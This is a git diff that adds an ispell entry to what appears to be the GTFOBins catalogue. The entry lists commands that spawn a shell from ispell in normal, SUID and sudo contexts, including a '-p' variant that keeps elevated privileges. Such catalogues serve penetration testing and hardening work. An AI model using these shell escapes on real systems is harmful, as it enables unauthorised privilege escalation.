diff --git a/_gtfobins/ispell.md b/_gtfobins/ispell.md new file mode 100644 index 0000000..3a90351 --- /dev/null +++ b/_gtfobins/ispell.md @@ -0,0 +1,15 @@ +--- +functions: + shell: + - code: | + ispell /etc/passwd + !/bin/sh + suid: + - code: | + ./ispell /etc/passwd + !/bin/sh -p + sudo: + - code: | + sudo ispell /etc/passwd + !/bin/sh +---